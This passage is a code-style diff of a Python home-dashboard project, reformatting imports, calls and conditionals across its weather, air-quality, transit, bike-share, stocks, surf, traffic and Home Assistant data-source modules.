@@ -12,7 +12,7 @@ from dataclasses import dataclass, field
 from datetime import datetime, timedelta
 from typing import Any
 
-from ..plugins.base import PluginBase, TriggerResult
+from src.plugins.base import PluginBase, TriggerResult
 
 logger = logging.getLogger(__name__)
 
@@ -31,6 +31,7 @@ class ActiveTrigger:
         duration_seconds: How long to keep showing the trigger.
         activated_at: When the trigger was activated.
     """
+
     trigger_id: str
     plugin_id: str
     message: str | None
@@ -169,9 +170,7 @@ class TriggerService:
             # not the full duration — once that window passes, the underlying
             # condition (e.g. "event happening soon") should be gone, and any
             # new trigger from the plugin is a fresh signal worth honoring.
-            self._suppressed_until[trigger_id] = (
-                active.activated_at + timedelta(seconds=active.duration_seconds)
-            )
+            self._suppressed_until[trigger_id] = active.activated_at + timedelta(seconds=active.duration_seconds)
             logger.info(
                 "Trigger dismissed + suppressed: %s (until %s)",
                 trigger_id,
@@ -204,9 +203,7 @@ class TriggerService:
 
     def clear_expired(self) -> None:
         """Remove all triggers that have exceeded their duration."""
-        expired = [
-            tid for tid, t in self._active_triggers.items() if t.is_expired()
-        ]
+        expired = [tid for tid, t in self._active_triggers.items() if t.is_expired()]
         for tid in expired:
             del self._active_triggers[tid]
             logger.debug("Trigger expired and removed: %s", tid)
@@ -238,9 +235,7 @@ class TriggerService:
         try:
             results = plugin.check_triggers()
         except Exception:
-            logger.exception(
-                "Error checking triggers for plugin %s", plugin.plugin_id
-            )
+            logger.exception("Error checking triggers for plugin %s", plugin.plugin_id)
             return
 
         for result in results:

--- a/src/utils/__init__.py
+++ b/src/utils/__init__.py
@@ -1,2 +1,1 @@
 """Utility modules for fetching information and shared functionality."""
-

--- a/src/utils/air_fog.py
+++ b/src/utils/air_fog.py
@@ -5,7 +5,7 @@ import math
 
 import requests
 
-from ..config import Config
+from src.config import Config
 
 logger = logging.getLogger(__name__)
 
@@ -68,7 +68,7 @@ class AirFogSource:
         openweathermap_api_key: str = "",
         latitude: float = DEFAULT_LAT,
         longitude: float = DEFAULT_LON,
-        purpleair_sensor_id: str | None = None
+        purpleair_sensor_id: str | None = None,
     ):
         """
         Initialize air/fog source.
@@ -133,9 +133,7 @@ class AirFogSource:
         for bp_low, bp_high, aqi_low, aqi_high, category, color in AirFogSource.AQI_BREAKPOINTS:
             if bp_low <= pm25 <= bp_high:
                 # Linear interpolation
-                aqi = round(
-                    ((aqi_high - aqi_low) / (bp_high - bp_low)) * (pm25 - bp_low) + aqi_low
-                )
+                aqi = round(((aqi_high - aqi_low) / (bp_high - bp_low)) * (pm25 - bp_low) + aqi_low)
                 return aqi, category, color
 
         # If above all breakpoints, return hazardous
@@ -164,11 +162,7 @@ class AirFogSource:
         return "VERY HIGH", "RED"
 
     @staticmethod
-    def determine_fog_status(
-        visibility_m: float,
-        humidity: float,
-        temp_f: float
-    ) -> tuple[bool, str, str]:
+    def determine_fog_status(visibility_m: float, humidity: float, temp_f: float) -> tuple[bool, str, str]:
         """
         Determine fog status based on visibility, humidity, and temperature.
 
@@ -211,16 +205,15 @@ class AirFogSource:
         """
         if aqi > 300:
             return "AIR: HAZARDOUS", "MAROON"
-        elif aqi > 200:
+        if aqi > 200:
             return "AIR: VERY UNHEALTHY", "PURPLE"
-        elif aqi > 150:
+        if aqi > 150:
             return "AIR: UNHEALTHY", "RED"
-        elif aqi > AirFogSource.AQI_FIRE_THRESHOLD:
+        if aqi > AirFogSource.AQI_FIRE_THRESHOLD:
             return "AIR: UNHEALTHY", "ORANGE"
-        elif aqi > 50:
+        if aqi > 50:
             return "AIR: MODERATE", "YELLOW"
-        else:
-            return "AIR: GOOD", "GREEN"
+        return "AIR: GOOD", "GREEN"
 
     def fetch_purpleair_data(self) -> dict[str, any] | None:
         """
@@ -314,7 +307,7 @@ class AirFogSource:
             "lat": self.latitude,
             "lon": self.longitude,
             "appid": self.openweathermap_api_key,
-            "units": "imperial"
+            "units": "imperial",
         }
 
         try:
@@ -379,15 +372,9 @@ class AirFogSource:
             tree_total = birch + alder + olive
             weed_total = ragweed + mugwort
 
-            grass_level, grass_color = self.determine_pollen_level(
-                grass, self.GRASS_POLLEN_THRESHOLDS
-            )
-            tree_level, tree_color = self.determine_pollen_level(
-                tree_total, self.TREE_POLLEN_THRESHOLDS
-            )
-            weed_level, weed_color = self.determine_pollen_level(
-                weed_total, self.WEED_POLLEN_THRESHOLDS
-            )
+            grass_level, grass_color = self.determine_pollen_level(grass, self.GRASS_POLLEN_THRESHOLDS)
+            tree_level, tree_color = self.determine_pollen_level(tree_total, self.TREE_POLLEN_THRESHOLDS)
+            weed_level, weed_color = self.determine_pollen_level(weed_total, self.WEED_POLLEN_THRESHOLDS)
 
             return {
                 "grass_pollen": round(grass, 1),
@@ -474,9 +461,7 @@ class AirFogSource:
 
             # Determine fog status
             is_foggy, fog_status, fog_color = self.determine_fog_status(
-                owm_data["visibility_m"],
-                owm_data["humidity"],
-                owm_data["temperature_f"]
+                owm_data["visibility_m"], owm_data["humidity"], owm_data["temperature_f"]
             )
             result["is_foggy"] = is_foggy
             result["fog_status"] = fog_status
@@ -484,10 +469,7 @@ class AirFogSource:
 
         # Calculate dew point if we have data but it wasn't from OWM
         if result["humidity"] and result["temperature_f"] and not result["dew_point_f"]:
-            result["dew_point_f"] = self.calculate_dew_point(
-                result["temperature_f"],
-                result["humidity"]
-            )
+            result["dew_point_f"] = self.calculate_dew_point(result["temperature_f"], result["humidity"])
 
         # Merge pollen data (Open-Meteo, free API)
         if pollen_data:
@@ -549,22 +531,21 @@ class AirFogSource:
 
 def get_air_fog_source() -> AirFogSource | None:
     """Get configured air/fog source instance."""
-    purpleair_key = Config.PURPLEAIR_API_KEY if hasattr(Config, 'PURPLEAIR_API_KEY') else ""
-    owm_key = Config.OPENWEATHERMAP_API_KEY if hasattr(Config, 'OPENWEATHERMAP_API_KEY') else ""
+    purpleair_key = Config.PURPLEAIR_API_KEY if hasattr(Config, "PURPLEAIR_API_KEY") else ""
+    owm_key = Config.OPENWEATHERMAP_API_KEY if hasattr(Config, "OPENWEATHERMAP_API_KEY") else ""
 
     if not purpleair_key and not owm_key:
         logger.warning("Neither PurpleAir nor OpenWeatherMap API keys configured")
         return None
 
-    latitude = Config.AIR_FOG_LATITUDE if hasattr(Config, 'AIR_FOG_LATITUDE') else DEFAULT_LAT
-    longitude = Config.AIR_FOG_LONGITUDE if hasattr(Config, 'AIR_FOG_LONGITUDE') else DEFAULT_LON
-    sensor_id = Config.PURPLEAIR_SENSOR_ID if hasattr(Config, 'PURPLEAIR_SENSOR_ID') else None
+    latitude = Config.AIR_FOG_LATITUDE if hasattr(Config, "AIR_FOG_LATITUDE") else DEFAULT_LAT
+    longitude = Config.AIR_FOG_LONGITUDE if hasattr(Config, "AIR_FOG_LONGITUDE") else DEFAULT_LON
+    sensor_id = Config.PURPLEAIR_SENSOR_ID if hasattr(Config, "PURPLEAIR_SENSOR_ID") else None
 
     return AirFogSource(
         purpleair_api_key=purpleair_key,
         openweathermap_api_key=owm_key,
         latitude=latitude,
         longitude=longitude,
-        purpleair_sensor_id=sensor_id
+        purpleair_sensor_id=sensor_id,
     )
-

--- a/src/utils/baywheels.py
+++ b/src/utils/baywheels.py
@@ -11,7 +11,7 @@ import time
 
 import requests
 
-from ..config import Config
+from src.config import Config
 
 logger = logging.getLogger(__name__)
 
@@ -50,7 +50,7 @@ def _haversine_distance(lat1: float, lon1: float, lat2: float, lon2: float) -> f
     dlat = lat2_rad - lat1_rad
     dlon = lon2_rad - lon1_rad
 
-    a = math.sin(dlat / 2)**2 + math.cos(lat1_rad) * math.cos(lat2_rad) * math.sin(dlon / 2)**2
+    a = math.sin(dlat / 2) ** 2 + math.cos(lat1_rad) * math.cos(lat2_rad) * math.sin(dlon / 2) ** 2
     c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
 
     return R * c
@@ -296,16 +296,11 @@ class BayWheelsSource:
             return None
 
         # Find station with most electric bikes
-        best = max(stations, key=lambda s: s.get("electric_bikes", 0))
-        return best
+        return max(stations, key=lambda s: s.get("electric_bikes", 0))
 
     @classmethod
     def find_stations_near_location(
-        cls,
-        lat: float,
-        lng: float,
-        radius_km: float = 2.0,
-        limit: int = 10
+        cls, lat: float, lng: float, radius_km: float = 2.0, limit: int = 10
     ) -> list[dict[str, any]]:
         """
         Find stations near a given location.
@@ -336,15 +331,17 @@ class BayWheelsSource:
             distance = _haversine_distance(lat, lng, station_lat, station_lon)
 
             if distance <= radius_km:
-                stations_with_distance.append({
-                    "station_id": station_id,
-                    "name": info.get("name", station_id),
-                    "lat": station_lat,
-                    "lon": station_lon,
-                    "address": info.get("address", ""),
-                    "capacity": info.get("capacity", 0),
-                    "distance_km": round(distance, 2),
-                })
+                stations_with_distance.append(
+                    {
+                        "station_id": station_id,
+                        "name": info.get("name", station_id),
+                        "lat": station_lat,
+                        "lon": station_lon,
+                        "address": info.get("address", ""),
+                        "capacity": info.get("capacity", 0),
+                        "distance_km": round(distance, 2),
+                    }
+                )
 
         # Sort by distance and limit results
         stations_with_distance.sort(key=lambda x: x["distance_km"])
@@ -362,10 +359,9 @@ class BayWheelsSource:
         """
         if electric_bikes < 2:
             return "red"
-        elif electric_bikes > 5:
+        if electric_bikes > 5:
             return "green"
-        else:
-            return "yellow"
+        return "yellow"
 
 
 def get_baywheels_source() -> BayWheelsSource | None:
@@ -382,4 +378,3 @@ def get_baywheels_source() -> BayWheelsSource | None:
         return None
 
     return BayWheelsSource(station_ids=station_ids)
-

--- a/src/utils/datetime.py
+++ b/src/utils/datetime.py
@@ -2,8 +2,8 @@
 
 import logging
 
-from ..config import Config
-from ..time_service import get_time_service
+from src.config import Config
+from src.time_service import get_time_service
 
 logger = logging.getLogger(__name__)
 

--- a/src/utils/home_assistant.py
+++ b/src/utils/home_assistant.py
@@ -4,7 +4,7 @@ import logging
 
 import requests
 
-from ..config import Config
+from src.config import Config
 
 logger = logging.getLogger(__name__)
 
@@ -21,13 +21,10 @@ class HomeAssistantSource:
             access_token: Long-lived access token
             timeout: Request timeout in seconds
         """
-        self.base_url = base_url.rstrip('/')
+        self.base_url = base_url.rstrip("/")
         self.access_token = access_token
         self.timeout = timeout
-        self.headers = {
-            "Authorization": f"Bearer {access_token}",
-            "Content-Type": "application/json"
-        }
+        self.headers = {"Authorization": f"Bearer {access_token}", "Content-Type": "application/json"}
         self.api_url = f"{self.base_url}/api"
 
     def get_entity_state(self, entity_id: str) -> dict | None:
@@ -85,14 +82,10 @@ class HomeAssistantSource:
                     "entity_id": entity_id,
                     "state": state,
                     "attributes": attributes,
-                    "friendly_name": attributes.get("friendly_name", name)
+                    "friendly_name": attributes.get("friendly_name", name),
                 }
             else:
-                status[name] = {
-                    "entity_id": entity_id,
-                    "state": "unavailable",
-                    "error": True
-                }
+                status[name] = {"entity_id": entity_id, "state": "unavailable", "error": True}
 
         return status
 
@@ -116,7 +109,7 @@ class HomeAssistantSource:
                 result[entity_id] = {
                     "state": entity["state"],
                     "attributes": entity.get("attributes", {}),
-                    "friendly_name": entity.get("attributes", {}).get("friendly_name", entity_id)
+                    "friendly_name": entity.get("attributes", {}).get("friendly_name", entity_id),
                 }
             return result
         except Exception as e:
@@ -154,7 +147,8 @@ def get_home_assistant_source() -> HomeAssistantSource | None:
     # Fall back to plugin config when features are empty (e.g. user only set plugin in UI)
     if (not base_url or not access_token) or not enabled:
         try:
-            from ..config_manager import get_config_manager
+            from src.config_manager import get_config_manager
+
             cm = get_config_manager()
             plugin_cfg = cm.get_plugin_config("home_assistant") or {}
             if plugin_cfg.get("enabled") and plugin_cfg.get("base_url") and plugin_cfg.get("access_token"):
@@ -171,9 +165,4 @@ def get_home_assistant_source() -> HomeAssistantSource | None:
         logger.warning("Home Assistant enabled but URL or access token not configured")
         return None
 
-    return HomeAssistantSource(
-        base_url=base_url,
-        access_token=access_token,
-        timeout=timeout
-    )
-
+    return HomeAssistantSource(base_url=base_url, access_token=access_token, timeout=timeout)

--- a/src/utils/muni.py
+++ b/src/utils/muni.py
@@ -10,14 +10,15 @@ import logging
 from datetime import UTC, datetime
 from typing import Any
 
-from ..config import Config
+from src.config import Config
+
 from .transit_cache import get_transit_cache
 
 logger = logging.getLogger(__name__)
 
 
 # Board color codes
-COLOR_RED = 63    # Delay indicator
+COLOR_RED = 63  # Delay indicator
 COLOR_ORANGE = 64  # Full occupancy indicator
 
 
@@ -49,7 +50,6 @@ class MuniSource:
 
         # For backward compatibility
         self.stop_code = self.stop_codes[0] if self.stop_codes else ""
-
 
     def fetch_arrivals(self) -> dict[str, Any] | None:
         """
@@ -118,13 +118,7 @@ class MuniSource:
                     continue
 
                 # Build a mock StopMonitoring response structure from cached visits
-                mock_response = {
-                    "ServiceDelivery": {
-                        "StopMonitoringDelivery": {
-                            "MonitoredStopVisit": visits
-                        }
-                    }
-                }
+                mock_response = {"ServiceDelivery": {"StopMonitoringDelivery": {"MonitoredStopVisit": visits}}}
 
                 # Parse using existing parser
                 parsed = self._parse_response(mock_response, stop_code)
@@ -151,8 +145,7 @@ class MuniSource:
             return None
 
         # Find stop with soonest arrival
-        best = min(stops, key=lambda s: s.get("arrivals", [{}])[0].get("minutes", 999) if s.get("arrivals") else 999)
-        return best
+        return min(stops, key=lambda s: s.get("arrivals", [{}])[0].get("minutes", 999) if s.get("arrivals") else 999)
 
     def _parse_response(self, data: dict[str, Any], stop_code: str | None = None) -> dict[str, Any] | None:
         """
@@ -212,9 +205,11 @@ class MuniSource:
                     stop_name = stop_point_name
 
                 # Calculate minutes until arrival
-                expected_arrival = monitored_call.get("ExpectedArrivalTime") or \
-                                   monitored_call.get("ExpectedDepartureTime") or \
-                                   monitored_call.get("AimedArrivalTime")
+                expected_arrival = (
+                    monitored_call.get("ExpectedArrivalTime")
+                    or monitored_call.get("ExpectedDepartureTime")
+                    or monitored_call.get("AimedArrivalTime")
+                )
 
                 if expected_arrival:
                     minutes = self._calculate_minutes_until(expected_arrival)
@@ -288,7 +283,9 @@ class MuniSource:
                     "arrivals": top_arrivals,
                     "next_arrival": top_arrivals[0]["minutes"] if top_arrivals else None,
                     "is_delayed": is_delayed,
-                    "delay_description": top_arrivals[0].get("delay_description", "") if is_delayed and top_arrivals else "",
+                    "delay_description": top_arrivals[0].get("delay_description", "")
+                    if is_delayed and top_arrivals
+                    else "",
                     "formatted": formatted,
                     "color_code": color_code,
                 }
@@ -356,7 +353,7 @@ class MuniSource:
         try:
             # Parse ISO timestamp (511.org uses ISO 8601 with timezone)
             # Handle various formats: 2024-12-24T10:30:00-08:00 or 2024-12-24T18:30:00Z
-            arrival_time = datetime.fromisoformat(iso_timestamp.replace('Z', '+00:00'))
+            arrival_time = datetime.fromisoformat(iso_timestamp.replace("Z", "+00:00"))
             now = datetime.now(UTC)
 
             delta = arrival_time - now
@@ -530,20 +527,16 @@ def get_muni_source() -> MuniSource | None:
     cache = get_transit_cache()
 
     # Configure cache with API key and refresh settings
-    refresh_interval = getattr(Config, 'TRANSIT_CACHE_REFRESH_SECONDS', 90)
-    cache_enabled = getattr(Config, 'TRANSIT_CACHE_ENABLED', True)
-    cache.configure(
-        api_key=Config.MUNI_API_KEY,
-        refresh_interval=refresh_interval,
-        enabled=cache_enabled
-    )
+    refresh_interval = getattr(Config, "TRANSIT_CACHE_REFRESH_SECONDS", 90)
+    cache_enabled = getattr(Config, "TRANSIT_CACHE_ENABLED", True)
+    cache.configure(api_key=Config.MUNI_API_KEY, refresh_interval=refresh_interval, enabled=cache_enabled)
 
     # Start cache if not already running
     if cache_enabled and not cache.is_ready():
         cache.start()
 
     # Support both new (MUNI_STOP_CODES list) and old (MUNI_STOP_CODE string) config
-    stop_codes = getattr(Config, 'MUNI_STOP_CODES', None)
+    stop_codes = getattr(Config, "MUNI_STOP_CODES", None)
 
     if not stop_codes:
         # Fall back to single stop code (backward compatibility)
@@ -558,6 +551,5 @@ def get_muni_source() -> MuniSource | None:
     return MuniSource(
         api_key=Config.MUNI_API_KEY,
         stop_codes=stop_codes,
-        line_name=Config.MUNI_LINE_NAME if Config.MUNI_LINE_NAME else None
+        line_name=Config.MUNI_LINE_NAME if Config.MUNI_LINE_NAME else None,
     )
-

--- a/src/utils/star_trek_quotes.py
+++ b/src/utils/star_trek_quotes.py
@@ -29,15 +29,17 @@ class StarTrekQuotesSource:
         self.voyager_weight = voyager_weight
         self.ds9_weight = ds9_weight
         self.quotes = self._load_quotes()
-        logger.info(f"Loaded Star Trek quotes: TNG={len(self.quotes.get('tng', []))}, "
-                   f"Voyager={len(self.quotes.get('voyager', []))}, "
-                   f"DS9={len(self.quotes.get('ds9', []))}")
+        logger.info(
+            f"Loaded Star Trek quotes: TNG={len(self.quotes.get('tng', []))}, "
+            f"Voyager={len(self.quotes.get('voyager', []))}, "
+            f"DS9={len(self.quotes.get('ds9', []))}"
+        )
 
     def _load_quotes(self) -> dict:
         """Load quotes from JSON file."""
         try:
             quotes_file = Path(__file__).parent / "star_trek_quotes.json"
-            with open(quotes_file) as f:
+            with quotes_file.open() as f:
                 return json.load(f)
         except Exception as e:
             logger.error(f"Error loading Star Trek quotes: {e}")
@@ -54,11 +56,7 @@ class StarTrekQuotesSource:
             return None
 
         # Create weighted list of series
-        series_pool = (
-            ['tng'] * self.tng_weight +
-            ['voyager'] * self.voyager_weight +
-            ['ds9'] * self.ds9_weight
-        )
+        series_pool = ["tng"] * self.tng_weight + ["voyager"] * self.voyager_weight + ["ds9"] * self.ds9_weight
 
         # Select random series based on weights
         selected_series = random.choice(series_pool)
@@ -69,13 +67,13 @@ class StarTrekQuotesSource:
             # Fallback to any available series
             all_quotes = []
             for series, quotes_list in self.quotes.items():
-                all_quotes.extend([{**q, 'series': series} for q in quotes_list])
+                all_quotes.extend([{**q, "series": series} for q in quotes_list])
             if not all_quotes:
                 return None
             quote_data = random.choice(all_quotes)
         else:
             quote_data = random.choice(series_quotes)
-            quote_data = {**quote_data, 'series': selected_series}
+            quote_data = {**quote_data, "series": selected_series}
 
         logger.debug(f"Selected quote from {selected_series}: {quote_data['quote'][:30]}...")
         return quote_data
@@ -88,14 +86,14 @@ def get_star_trek_quotes_source() -> StarTrekQuotesSource | None:
     Returns:
         StarTrekQuotesSource instance or None if disabled
     """
-    from ..config import Config
+    from src.config import Config
 
     if not Config.STAR_TREK_QUOTES_ENABLED:
         return None
 
     try:
         # Parse ratio from config
-        ratio_parts = Config.STAR_TREK_QUOTES_RATIO.split(':')
+        ratio_parts = Config.STAR_TREK_QUOTES_RATIO.split(":")
         if len(ratio_parts) == 3:
             tng_weight = int(ratio_parts[0])
             voyager_weight = int(ratio_parts[1])
@@ -108,4 +106,3 @@ def get_star_trek_quotes_source() -> StarTrekQuotesSource | None:
     except Exception as e:
         logger.error(f"Error creating Star Trek quotes source: {e}")
         return None
-

--- a/src/utils/stocks.py
+++ b/src/utils/stocks.py
@@ -137,12 +137,7 @@ POPULAR_STOCKS = [
 class StocksSource:
     """Fetches stock market data using yfinance."""
 
-    def __init__(
-        self,
-        symbols: list[str],
-        time_window: str,
-        finnhub_api_key: str | None = None
-    ):
+    def __init__(self, symbols: list[str], time_window: str, finnhub_api_key: str | None = None):
         """
         Initialize stocks source.
 
@@ -272,16 +267,18 @@ class StocksSource:
             else:
                 # Create placeholder entry for failed stock to maintain index alignment
                 symbol = self.symbols[index] if index < len(self.symbols) else f"UNKNOWN_{index}"
-                results.append({
-                    "symbol": symbol,
-                    "current_price": 0.0,
-                    "previous_price": 0.0,
-                    "change_percent": 0.0,
-                    "change_direction": "none",
-                    "formatted": f"{symbol}{{white}} $0.00 +0.00%",
-                    "color_tile": "{white}",
-                    "company_name": f"Failed to fetch: {symbol}",
-                })
+                results.append(
+                    {
+                        "symbol": symbol,
+                        "current_price": 0.0,
+                        "previous_price": 0.0,
+                        "change_percent": 0.0,
+                        "change_direction": "none",
+                        "formatted": f"{symbol}{{white}} $0.00 +0.00%",
+                        "color_tile": "{white}",
+                        "company_name": f"Failed to fetch: {symbol}",
+                    }
+                )
 
         return results
 
@@ -396,11 +393,7 @@ class StocksSource:
             }
         """
         if not symbol or not symbol.strip():
-            return {
-                "valid": False,
-                "symbol": symbol,
-                "error": "Empty symbol"
-            }
+            return {"valid": False, "symbol": symbol, "error": "Empty symbol"}
 
         symbol = symbol.strip().upper()
 
@@ -410,37 +403,21 @@ class StocksSource:
 
             # Check if we got valid data (invalid symbols return empty info or error)
             if not info or "symbol" not in info:
-                return {
-                    "valid": False,
-                    "symbol": symbol,
-                    "error": "Symbol not found"
-                }
+                return {"valid": False, "symbol": symbol, "error": "Symbol not found"}
 
             # Try to get price to confirm it's valid
             current_price = info.get("regularMarketPrice") or info.get("currentPrice")
             if current_price is None:
-                return {
-                    "valid": False,
-                    "symbol": symbol,
-                    "error": "No price data available"
-                }
+                return {"valid": False, "symbol": symbol, "error": "No price data available"}
 
             # Get company name
             company_name = info.get("longName") or info.get("shortName") or symbol
 
-            return {
-                "valid": True,
-                "symbol": symbol,
-                "name": company_name
-            }
+            return {"valid": True, "symbol": symbol, "name": company_name}
 
         except Exception:
             logger.error("Symbol validation failed for %s", symbol, exc_info=True)
-            return {
-                "valid": False,
-                "symbol": symbol,
-                "error": "Unable to validate symbol at this time"
-            }
+            return {"valid": False, "symbol": symbol, "error": "Unable to validate symbol at this time"}
 
     @staticmethod
     def search_symbols(query: str, limit: int = 10, finnhub_api_key: str | None = None) -> list[dict[str, str]]:
@@ -468,6 +445,7 @@ class StocksSource:
         if finnhub_api_key:
             try:
                 import finnhub
+
                 # finnhub-python package uses Client class
                 finnhub_client = finnhub.Client(api_key=finnhub_api_key)
                 search_results = finnhub_client.symbol_lookup(query)
@@ -479,10 +457,7 @@ class StocksSource:
                             symbol = item.get("symbol", "")
                             description = item.get("description", "")
                             if symbol and description:
-                                results.append({
-                                    "symbol": symbol,
-                                    "name": description
-                                })
+                                results.append({"symbol": symbol, "name": description})
 
                 if results:
                     return results[:limit]
@@ -500,10 +475,7 @@ class StocksSource:
 
             # Match if query is in symbol or name (case-insensitive)
             if query_lower in symbol.lower() or query_lower in name.lower():
-                results.append({
-                    "symbol": symbol,
-                    "name": name
-                })
+                results.append({"symbol": symbol, "name": name})
 
         return results[:limit]
 
@@ -515,7 +487,7 @@ _stocks_source: StocksSource | None = None
 def get_stocks_source() -> StocksSource | None:
     """Get or create the stocks source singleton."""
     global _stocks_source
-    from ..config import Config
+    from src.config import Config
 
     if not Config.STOCKS_ENABLED:
         return None
@@ -524,7 +496,7 @@ def get_stocks_source() -> StocksSource | None:
         _stocks_source = StocksSource(
             symbols=Config.STOCKS_SYMBOLS,
             time_window=Config.STOCKS_TIME_WINDOW,
-            finnhub_api_key=Config.FINNHUB_API_KEY if Config.FINNHUB_API_KEY else None
+            finnhub_api_key=Config.FINNHUB_API_KEY if Config.FINNHUB_API_KEY else None,
         )
 
     return _stocks_source
@@ -534,4 +506,3 @@ def reset_stocks_source() -> None:
     """Reset the stocks source singleton."""
     global _stocks_source
     _stocks_source = None
-

--- a/src/utils/surf.py
+++ b/src/utils/surf.py
@@ -240,7 +240,7 @@ class SurfSource:
             Formatted message: "OB SURF: [Height]ft @ [Period]s"
         """
         # Round period to integer for cleaner display
-        period_display = int(round(swell_period)) if swell_period else 0
+        period_display = round(swell_period) if swell_period else 0
         return f"OB SURF: {wave_height}ft @ {period_display}s"
 
 

--- a/src/utils/surf.py
+++ b/src/utils/surf.py
@@ -63,7 +63,7 @@ class SurfSource:
             "daily": "wave_height_max,swell_wave_period_max",
             "wind_speed_unit": "mph",
             "timezone": "America/Los_Angeles",
-            "forecast_days": 1
+            "forecast_days": 1,
         }
 
         try:
@@ -124,7 +124,7 @@ class SurfSource:
                 "formatted_message": formatted_message,
                 "location": "Ocean Beach, SF",
                 "latitude": self.latitude,
-                "longitude": self.longitude
+                "longitude": self.longitude,
             }
 
         except requests.exceptions.RequestException as e:
@@ -153,7 +153,7 @@ class SurfSource:
             "longitude": self.longitude,
             "current": "wind_speed_10m,wind_direction_10m",
             "wind_speed_unit": "mph",
-            "timezone": "America/Los_Angeles"
+            "timezone": "America/Los_Angeles",
         }
 
         try:
@@ -171,7 +171,7 @@ class SurfSource:
             return {
                 "wind_speed_mph": wind_speed_mph,
                 "wind_speed_kmh": wind_speed_kmh,
-                "wind_direction": wind_direction
+                "wind_direction": wind_direction,
             }
 
         except Exception as e:
@@ -255,4 +255,3 @@ def get_surf_source() -> SurfSource | None:
         SurfSource instance
     """
     return SurfSource()
-

--- a/src/utils/traffic.py
+++ b/src/utils/traffic.py
@@ -7,7 +7,7 @@ import logging
 
 import requests
 
-from ..config import Config
+from src.config import Config
 
 logger = logging.getLogger(__name__)
 
@@ -17,13 +17,9 @@ class TrafficSource:
 
     # Traffic index thresholds
     TRAFFIC_INDEX_YELLOW = 1.2  # 20% slower than normal
-    TRAFFIC_INDEX_RED = 1.5    # 50% slower than normal
+    TRAFFIC_INDEX_RED = 1.5  # 50% slower than normal
 
-    def __init__(
-        self,
-        api_key: str,
-        routes: list[dict[str, str]]
-    ):
+    def __init__(self, api_key: str, routes: list[dict[str, str]]):
         """
         Initialize traffic source.
 
@@ -50,10 +46,7 @@ class TrafficSource:
             self.destination_name = self.routes[0].get("destination_name", "DOWNTOWN")
 
     @staticmethod
-    def calculate_traffic_index(
-        duration_in_traffic: int | None,
-        duration_normal: int
-    ) -> float:
+    def calculate_traffic_index(duration_in_traffic: int | None, duration_normal: int) -> float:
         """
         Calculate traffic index as ratio of traffic time to normal time.
 
@@ -91,17 +84,12 @@ class TrafficSource:
         """
         if traffic_index > TrafficSource.TRAFFIC_INDEX_RED:
             return "HEAVY", "RED"
-        elif traffic_index > TrafficSource.TRAFFIC_INDEX_YELLOW:
+        if traffic_index > TrafficSource.TRAFFIC_INDEX_YELLOW:
             return "MODERATE", "YELLOW"
-        else:
-            return "LIGHT", "GREEN"
+        return "LIGHT", "GREEN"
 
     @staticmethod
-    def format_message(
-        destination_name: str,
-        duration_minutes: int,
-        delay_minutes: int
-    ) -> str:
+    def format_message(destination_name: str, duration_minutes: int, delay_minutes: int) -> str:
         """
         Format traffic message for display.
 
@@ -117,8 +105,7 @@ class TrafficSource:
         """
         if delay_minutes > 0:
             return f"{destination_name}: {duration_minutes}m (+{delay_minutes}m delay)"
-        else:
-            return f"{destination_name}: {duration_minutes}m"
+        return f"{destination_name}: {duration_minutes}m"
 
     @staticmethod
     def _parse_duration(duration_str: str) -> int:
@@ -134,7 +121,7 @@ class TrafficSource:
         if not duration_str:
             return 0
         # Remove 's' suffix and convert to int
-        return int(duration_str.rstrip('s'))
+        return int(duration_str.rstrip("s"))
 
     def fetch_traffic_data(self) -> dict[str, any] | None:
         """
@@ -170,7 +157,7 @@ class TrafficSource:
                     origin=route.get("origin", ""),
                     destination=route.get("destination", ""),
                     destination_name=route.get("destination_name", "DESTINATION"),
-                    travel_mode=route.get("travel_mode", "DRIVE")
+                    travel_mode=route.get("travel_mode", "DRIVE"),
                 )
                 if data:
                     results.append(data)
@@ -192,15 +179,10 @@ class TrafficSource:
             return None
 
         # Find route with highest delay
-        worst = max(routes, key=lambda r: r.get("delay_minutes", 0))
-        return worst
+        return max(routes, key=lambda r: r.get("delay_minutes", 0))
 
     def _fetch_single_route(
-        self,
-        origin: str,
-        destination: str,
-        destination_name: str,
-        travel_mode: str = "DRIVE"
+        self, origin: str, destination: str, destination_name: str, travel_mode: str = "DRIVE"
     ) -> dict[str, any] | None:
         """
         Fetch traffic data for a single route from Google Routes API.
@@ -221,7 +203,7 @@ class TrafficSource:
         headers = {
             "Content-Type": "application/json",
             "X-Goog-Api-Key": self.api_key,
-            "X-Goog-FieldMask": "routes.duration,routes.staticDuration,routes.routeToken"
+            "X-Goog-FieldMask": "routes.duration,routes.staticDuration,routes.routeToken",
         }
 
         # Validate travel mode
@@ -237,7 +219,7 @@ class TrafficSource:
             "travelMode": travel_mode.upper(),
             "computeAlternativeRoutes": False,
             "languageCode": "en-US",
-            "units": "IMPERIAL"
+            "units": "IMPERIAL",
         }
 
         # Only add routing preference for DRIVE and TWO_WHEELER
@@ -250,11 +232,15 @@ class TrafficSource:
 
             # Handle specific HTTP errors with helpful messages
             if response.status_code == 403:
-                logger.error("Google Routes API returned 403 Forbidden. Check: 1) Routes API is enabled, 2) Billing is set up, 3) API key has proper restrictions")
+                logger.error(
+                    "Google Routes API returned 403 Forbidden. Check: 1) Routes API is enabled, 2) Billing is set up, 3) API key has proper restrictions"
+                )
                 logger.error(f"Response: {response.text}")
                 return None
-            elif response.status_code == 400:
-                logger.error("Google Routes API returned 400 Bad Request. The addresses may be invalid or improperly formatted.")
+            if response.status_code == 400:
+                logger.error(
+                    "Google Routes API returned 400 Bad Request. The addresses may be invalid or improperly formatted."
+                )
                 logger.error(f"Response: {response.text}")
                 return None
 
@@ -289,30 +275,23 @@ class TrafficSource:
             static_duration_minutes = round(static_duration / 60)
 
             # Format message
-            formatted_message = self.format_message(
-                destination_name,
-                duration_minutes,
-                delay_minutes
-            )
+            formatted_message = self.format_message(destination_name, duration_minutes, delay_minutes)
 
             return {
                 # Raw durations (seconds)
                 "duration": duration_in_traffic,
                 "static_duration": static_duration,
                 "route_token": route_token,
-
                 # Calculated values
                 "traffic_index": traffic_index,
                 "traffic_status": traffic_status,
                 "traffic_color": traffic_color,
-
                 # Friendly formats
                 "duration_minutes": duration_minutes,
                 "static_duration_minutes": static_duration_minutes,
                 "delay_minutes": delay_minutes,
                 "formatted_message": formatted_message,
                 "formatted": formatted_message,  # Alias for template compatibility
-
                 # Route info
                 "origin": origin,
                 "destination": destination,
@@ -347,52 +326,38 @@ class TrafficSource:
                 try:
                     lat = float(parts[0].strip())
                     lng = float(parts[1].strip())
-                    return {
-                        "location": {
